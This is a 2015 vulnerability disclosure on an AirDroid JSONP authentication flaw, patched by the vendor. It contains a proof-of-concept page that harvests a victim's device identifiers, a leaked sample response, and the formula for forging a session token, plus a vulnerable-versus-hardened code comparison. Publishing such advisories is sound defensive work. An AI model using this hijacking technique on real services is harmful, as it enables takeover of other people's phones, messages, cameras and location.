AirDroid Web Application Authentication Flaw

By Matt Bryant

Title

AirDroid Web Application Authentication Flaw

Release Date

April 15, 2015

Patch Date

March 2015

Reported Date

February 27, 2015 – Submitted to AirDroid

Vendor

AirDroid/Sand Studio/TongBu Networks

Systems Affected

None. Vulnerability patched as of March 2015.

Summary

AirDroid version 3.0.4 and earlier web applications use JSON with Padding (JSONP) to perform cross-origin requests. Because JSONP is an insecure way of sharing data across origins (any site that loads the endpoint in a script tag receives the response, sent with the visitor's cookies), it is possible to hijack all of the AirDroid web application functionality and, by doing so, hijack other users' Android devices.

Vendor Status

AirDroid has been made aware of the issue and has pushed a patch to the web interface here.

Exploit Availability

We created an exploit to demonstrate the severity of this particular vulnerability. It works as follows:

1. Construct a malicious page that sources the following JSONP endpoint:

<!DOCTYPE html>
<body>
  <script>
    <!-- Callback invoked by the JSONP response; it receives the victim's account record -->
    function _callhack( stolen_data ) {
      alert( JSON.stringify( stolen_data ) );
    }
  </script>
  <script src="https://id.airdroid.com/p9/user/signIn.html?callback=_callhack"></script>
</body>

2. Lure an authenticated AirDroid user to the malicious page created in step 1. The victim's browser then sources the JSONP endpoint above using the victim's active AirDroid web session, and the response contains the information needed to generate a valid 7bb session token. A sample response is given below:

_callhack({"code":"1","result":{"id":"2960728","nickname":"mandatory","mail":"mandatory@[REDACTED]","create_date":"2013-11-27 03:01:58","data_flow_total":"0","vip":"0","vip_starttime":null,"vip_endtime":null,"from_type":"","read_new":"1","mail_verify":"1","pay_type":"0","isPremium":-1,"has_device":"1","device":[{"id":"2800627","name":"","deviceId":"182bed78cde24b3aa9458b[REDACTED]","channelToken":"ae089b0a0a0d[REDACTED]","logicKey":"7530f7bd7149c7c57a5[REDACTED]","manu":"samsung","model":"SM-N900V","model_pic":"http://img.airdroid.com/devices//samsung/Samsung Note 3","osVersion":"4.3","sdkApiLevel":"18","netOpts":{"ip":"[REDACTED]","port":8888,"socket_port":8889,"ssl_port":8890,"usewifi":"true"},"appVer":"67","is_default":"0","imsi":"311480[REDACTED]","create_date":"2014-08-23 22:37:18"}],"app_last_modify":"1415991234"},"msg":"success!"})

3. Using the above information, a valid 7bb session token can be generated. The following pseudocode shows how the token is constructed:

bb = UNIX_TIMESTAMP + md5(UNIX_TIMESTAMP + DEVICE_ID + LOGIC_KEY)

Here + denotes string concatenation, and DEVICE_ID and LOGIC_KEY are the deviceId and logicKey values returned in the response above.
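The root cause is that an authenticated endpoint answered in JSONP. The following is an added example, not AirDroid's code: a minimal model of a signIn-style handler in its vulnerable JSONP form beside a hardened form that serves plain JSON and admits cross-origin callers only through an explicit CORS allow-list. The handler names, ALLOWED_ORIGINS, the request shape and the sample record are assumptions.

```javascript
// Assumed allow-list of first-party origins permitted to read the endpoint.
const ALLOWED_ORIGINS = new Set(['https://web.example-origin.com']);

// Constructed stand-in for the per-session record. The real reply carried
// deviceId, channelToken and logicKey, the inputs to the 7bb token.
const SESSION_RESULT = {
  id: '0000000',
  device: [{ deviceId: 'DEVICE_ID_PLACEHOLDER', logicKey: 'LOGIC_KEY_PLACEHOLDER' }],
};

// Vulnerable: the reply is executable JavaScript calling the caller-chosen
// callback. A <script src=...?callback=f> tag on any site is fetched with the
// victim's cookies and executed, so f() receives the whole record.
function handleSignInJsonp(req) {
  const body = JSON.stringify({ code: '1', result: SESSION_RESULT, msg: 'success!' });
  const cb = req.query.callback;
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript' },
    body: cb ? `${cb}(${body})` : body,
  };
}

// Hardened: always plain JSON (a callback parameter is ignored), so a
// cross-site <script> tag gets nothing it can execute; nosniff stops the
// browser reinterpreting the body as script; legitimate cross-origin callers
// use fetch/XHR and are admitted only when their Origin is allow-listed.
function handleSignInHardened(req) {
  const headers = {
    'Content-Type': 'application/json',
    'X-Content-Type-Options': 'nosniff',
    Vary: 'Origin',
  };
  const origin = req.headers.origin;
  if (origin !== undefined && ALLOWED_ORIGINS.has(origin)) {
    // Echo only an allow-listed origin; never '*' together with credentials.
    headers['Access-Control-Allow-Origin'] = origin;
    headers['Access-Control-Allow-Credentials'] = 'true';
  }
  return {
    status: 200,
    headers,
    body: JSON.stringify({ code: '1', result: SESSION_RESULT, msg: 'success!' }),
  };
}

// True when a reply, loaded by a <script> tag, would run as a call to `cb`.
function leaksViaCallback(resp, cb) {
  return resp.body.startsWith(`${cb}(`);
}
```

Without the callback wrapper a third-party page can still trigger the request, but the browser's same-origin policy prevents it from reading the JSON body unless the server echoes its origin in Access-Control-Allow-Origin.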

Researcher

Matt Bryant of Bishop Fox

Vulnerability Details

This authentication flaw allows remote control of other users' Android phones. With a hijacked session, an attacker can use every function the AirDroid web application exposes:
SMS: Send and receive individual or group messages.
Apps: Import and export .apk files.
Files: Manage files on Android and transfer files between Android and computer.
Photos: View and manage photos on Android and transfer photos between Android and computer.
Music & Videos: Play and manage music & videos on Android and transfer them between Android and computer.
Ringtones: Set music as ringtone and export any ringtone.
Contacts: View and edit all the contacts.
Screenshot: View the real-time screen of Android devices and take static screenshots (root required).
Camera: See through the lens of both front and back camera; also supports the flashlight.
URL: Push a URL to Android and automatically open it with the Android browser.
Clipboard: Share clipboard content between Android and computer.
GPS: Track the mobile device's location.